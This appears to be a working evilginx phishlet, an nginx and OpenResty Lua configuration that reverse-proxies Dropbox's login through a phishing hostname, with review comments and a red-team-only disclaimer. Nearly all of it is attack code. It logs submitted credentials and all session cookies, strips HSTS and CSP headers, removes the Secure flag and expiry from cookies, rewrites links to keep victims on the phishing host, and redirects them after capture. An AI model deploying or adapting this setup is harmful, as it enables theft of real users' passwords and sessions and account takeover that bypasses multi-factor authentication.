# evilginx phishlet (nginx + OpenResty Lua) that reverse-proxies the Dropbox
# login flow through an operator-controlled hostname. The {{...}} tokens are
# filled in by evilginx when the phishlet is installed. Authorized red-team
# use only.
#
# NOTE(review): this access log records $request_body, $http_cookie and every
# upstream Set-Cookie line, i.e. captured credentials and session tokens.
# Treat {{LOG_DIR}}{{LOG_NAME}} as sensitive material (file permissions,
# retention, destruction at the end of the engagement).
# NOTE(review): nginx's default log escaping renders '"' and '\' as \xHH,
# so a strict JSON parser may reject lines that contain them - confirm before
# feeding this log to a JSON consumer.
log_format dropbox_phish '{"remote_addr":"$remote_addr","time":"$time_local","host":"$http_host","request":"$request","status":"$status","referer":"$http_referer","ua":"$http_user_agent","conn":"$connection","cookies":"$http_cookie","set-cookies":"$set_cookies_all","body":"$request_body"}';
server {
# One server block answers both plain HTTP and TLS; plain HTTP is bounced to
# https:// by the `if` below.
listen 80;
listen 443 ssl;
server_name {{PHISH_HOSTNAME[0]}};
ssl_certificate {{CERT_PUBLIC_PATH}};
ssl_certificate_key {{CERT_PRIVATE_PATH}};
# NOTE(review): TLSv1 and TLSv1.1 are deprecated (RFC 8996); keeping them
# enabled only matters if a target's browser cannot negotiate TLS 1.2.
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
ssl_prefer_server_ciphers on;
ssl_ciphers 'EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH';
# Force HTTPS so the https:// links rewritten into proxied pages stay on
# this host.
if ($scheme = http) {
return 301 https://$server_name$request_uri;
}
location / {
# The access phase below reads request bodies with ngx.req.get_body_data(),
# which returns nil once a body is larger than this buffer (nginx spills it
# to a temp file). Keep it >= the largest login POST expected.
client_body_buffer_size 64k;
# Upstream is the real site. Cookie domains and Location headers are
# rewritten from the target host to the phish host on the way back.
proxy_pass https://{{TARGET_HOST[0]}};
proxy_cookie_domain {{COOKIE_HOST[0]}} {{PHISH_DOMAIN}};
proxy_cookie_domain {{TARGET_HOST[0]}} {{PHISH_HOSTNAME[0]}};
proxy_redirect https://{{TARGET_HOST[0]}}/ https://{{PHISH_HOSTNAME[0]}}/;
# Body rewrites: absolute form actions, hrefs and bare quoted host strings
# pointing at the target are repointed at the phish host. Every occurrence
# is replaced (sub_filter_once off) and application/json bodies are
# filtered in addition to nginx's default text/html.
sub_filter 'action="https://{{TARGET_HOST[0]}}' 'action="https://{{PHISH_HOSTNAME[0]}}';
sub_filter 'href="https://{{TARGET_HOST[0]}}' 'href="https://{{PHISH_HOSTNAME[0]}}';
sub_filter '"{{TARGET_HOST[0]}}"' '"{{PHISH_HOSTNAME[0]}}"';
sub_filter '"dropbox.com"' '"{{PHISH_DOMAIN}}"';
sub_filter_once off;
sub_filter_types application/json;
# Name of the upstream Set-Cookie that marks a successful login. The header
# filter below checks for it to decide when to fire the final redirect.
set $auth_token "lid";
# Ask upstream for an uncompressed body; sub_filter cannot rewrite gzip.
proxy_set_header Accept-Encoding "";
# Forwards the visitor's real address to the target, as a normal reverse
# proxy would.
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
# Post-capture redirect URL, taken from the ?{{REDIR_ARG}}= parameter of the
# lure link (set_unescape_uri needs the set-misc-nginx-module).
set_unescape_uri $redir $arg_{{REDIR_ARG}};
# Declared here so the header filter can assign it for the access log.
set $set_cookies_all "";
access_log {{LOG_DIR}}{{LOG_NAME}} dropbox_phish;
access_by_lua_block {
-- Rewrite Origin/Referer so upstream sees its own hostname rather than the
-- phish host. PHISH_HOSTNAME_ESC is presumably the hostname with Lua
-- pattern magic characters ('.', '-') escaped - confirm in the template.
-- NOTE(review): 'val' is assigned without 'local' (accidental global).
if ngx.var.http_origin ~= nil then
val = string.gsub(ngx.var.http_origin, '{{PHISH_HOSTNAME_ESC[0]}}', '{{TARGET_HOST[0]}}')
ngx.req.set_header("Origin", val)
end
if ngx.var.http_referer ~= nil then
val = string.gsub(ngx.var.http_referer, '{{PHISH_HOSTNAME_ESC[0]}}', '{{TARGET_HOST[0]}}')
ngx.req.set_header("Referer", val)
end
-- Once both the stored-redirect cookie and the success cookie are present,
-- every further request is bounced to the stored URL. That URL came from
-- the operator's lure parameter, so this is an open redirect by design.
-- Both matches are unanchored, so a longer cookie name ending in the same
-- suffix would also match. ngx.redirect terminates the handler itself,
-- which is why there is no explicit return after it.
if ngx.var.http_cookie ~= nil then
local c_rc = string.match(ngx.var.http_cookie, "{{REDIR_ARG}}=([^;]*)")
local c_rd = string.match(ngx.var.http_cookie, "{{SUCCESS_ARG}}=([^;]*)")
if c_rc ~= nil and c_rd ~= nil then
ngx.redirect(c_rc)
end
end
-- If the browser carries a 't' cookie, rewrite any 't=' field in the POST
-- body to the same value. NOTE(review): presumably keeps a CSRF/state token
-- in the form in sync with the cookie after the proxy rewrote cookies -
-- confirm against the target's login form.
-- NOTE(review): the token and the full rewritten body are written to the
-- nginx error log at NOTICE level - a second copy of captured credentials.
-- NOTE(review): c_t, newbody, n and err are accidental globals.
if ngx.var.http_cookie ~= nil then
local m_t = ngx.re.match(ngx.var.http_cookie, "\\bt=([^;]*)")
if m_t then
c_t = m_t[1]
ngx.log(ngx.NOTICE, c_t)
ngx.req.read_body()
local body = ngx.req.get_body_data()
if body ~= nil then
newbody, n, err = ngx.re.gsub(body, "\\bt=[^&]*", "t=" .. c_t)
if newbody then
ngx.log(ngx.NOTICE, newbody)
ngx.req.set_body_data(newbody)
end
end
end
end
}
header_filter_by_lua_block {
-- Helpers over the (possibly multi-valued) Set-Cookie response header.
-- NOTE(review): these are defined as globals from a per-request handler;
-- OpenResty warns about that and the definitions are shared by every
-- request in the worker. Prefer 'local function' or an init_by_lua module.
-- get_cookies: always returns a table, wrapping a single string value.
function get_cookies()
local cookies = ngx.header.set_cookie or {}
if type(cookies) == "string" then
cookies = {cookies}
end
return cookies
end
-- add_cookie: appends one Set-Cookie line to the response.
function add_cookie(cookie)
local cookies = get_cookies()
table.insert(cookies, cookie)
ngx.header.set_cookie = cookies
end
-- exists_cookie: true when upstream is setting a cookie with this name.
-- The name is spliced into a Lua pattern unescaped; fine for "lid", but
-- names containing pattern magic characters would need escaping.
function exists_cookie(cookie)
local cookies = get_cookies()
for i, val in ipairs(cookies) do
if string.match(val, "^" .. cookie .. "=") ~= nil then
return true
end
end
return false
end
-- Strip HSTS and CSP from the proxied response. NOTE(review): presumably so
-- the browser does not pin HSTS for this host and so the rewritten page is
-- not blocked by the target's policy - these are upstream's headers; confirm.
ngx.header["Strict-Transport-Security"] = {}
ngx.header["Content-Security-Policy"] = {}
-- First visit via the lure: persist the redirect URL from the query string
-- in a cookie. A leading '0' marks a base64-encoded value.
-- NOTE(review): ngx.decode_base64 returns nil on malformed input; confirm
-- ngx.escape_uri tolerates nil here rather than raising.
if ngx.var.redir ~= "" then
local r_url = ngx.var.redir
if string.sub(r_url,1,1) == '0' then
val = string.sub(ngx.var.redir, 2)
r_url = ngx.decode_base64(val)
end
add_cookie("{{REDIR_ARG}}=" .. ngx.escape_uri(r_url) .. "; path=/")
end
-- NOTE(review): empty branch - dead code.
if ngx.header.location then
end
-- Final redirect: when the stored-redirect cookie exists and either
-- upstream is setting the auth cookie ($auth_token) on this response or
-- the success cookie is already present, overwrite Location with the stored
-- URL and mark success. NOTE(review): the status code is not changed, so a
-- browser only follows this when the upstream response is already a 3xx -
-- presumably its post-login redirect; confirm.
if ngx.var.http_cookie ~= nil then
local c_rc = string.match(ngx.var.http_cookie, "{{REDIR_ARG}}=([^;]*)")
local c_rd = string.match(ngx.var.http_cookie, "{{SUCCESS_ARG}}=([^;]*)")
if c_rc ~= nil then
if exists_cookie(ngx.var.auth_token) or c_rd ~= nil then
ngx.header.location = ngx.unescape_uri(c_rc)
add_cookie("{{SUCCESS_ARG}}=true; path=/")
end
end
end
-- Normalize every upstream Set-Cookie: drop Max-Age and Expires (they become
-- session cookies) and the Secure flag (reason not evident from here), then
-- join them with '||' into $set_cookies_all for the access log.
-- The 'not cookies' guard is redundant under the enclosing if.
if ngx.header.set_cookie then
local cookies = ngx.header.set_cookie
if not cookies then return end
if type(cookies) ~= "table" then cookies = {cookies} end
local newcookies = {}
local allcookies = ""
for i, val in ipairs(cookies) do
val = string.gsub(val, '; *[mM]ax%-[aA]ge=[^;]*', "")
val = string.gsub(val, '; *[eE]xpires=[^;]*', "")
val = string.gsub(val, '; *[sS]ecure', "")
table.insert(newcookies, val)
if i>1 then allcookies = allcookies .. "||" end
allcookies = allcookies .. val
end
ngx.header.set_cookie = newcookies
ngx.var.set_cookies_all = allcookies
end
}
}
}